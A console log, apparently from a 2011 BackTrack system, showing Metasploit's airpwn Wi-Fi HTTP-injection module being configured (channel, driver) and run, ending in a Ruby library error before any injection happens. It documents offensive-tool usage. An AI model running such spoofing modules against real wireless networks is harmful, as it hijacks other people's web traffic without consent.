root@bt:/pentest/exploits/framework3# ./msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 691 exploits - 358 auxiliary - 39 post
+ -- --=[ 222 payloads - 27 encoders - 8 nops
=[ svn r12763 updated 4 days ago (2011.05.29)
msf > use auxiliary/spoof/wifi/airpwn
msf auxiliary(airpwn) > show options
Module options (auxiliary/spoof/wifi/airpwn):
Name Current Setting Required Description
---- --------------- -------- -----------
CHANNEL 11 yes The initial channel
DRIVER autodetect yes The name of the wireless driver for lorcon
FILTER port 80 yes Default BPF filter
INTERFACE wlan0 yes The name of the wireless interface
MATCH GET ([^ ?]+) HTTP yes Default request match
RESPONSE Airpwn yes Default response
SITELIST /opt/framework3/msf3/data/exploits/wifi/airpwn/sitelist.yml no YAML file of URL/Replacement pairs for GET replacement
USESITEFILE false yes Use site list file for match/response
msf auxiliary(airpwn) > set channel 13
channel => 13
msf auxiliary(airpwn) > set DRIVER Madwifing
DRIVER => Madwifing
msf auxiliary(airpwn) > run
[*] AIRPWN: Parsing responses and defining headers
[*] AIRPWN: Response packet has no HTTP headers, creating some.
[*] Opening wifi module.
ruby: symbol lookup error: /usr/local/lib/site_ruby/1.9.2/i486-linux/Lorcon2.so: undefined symbol: STR2CSTR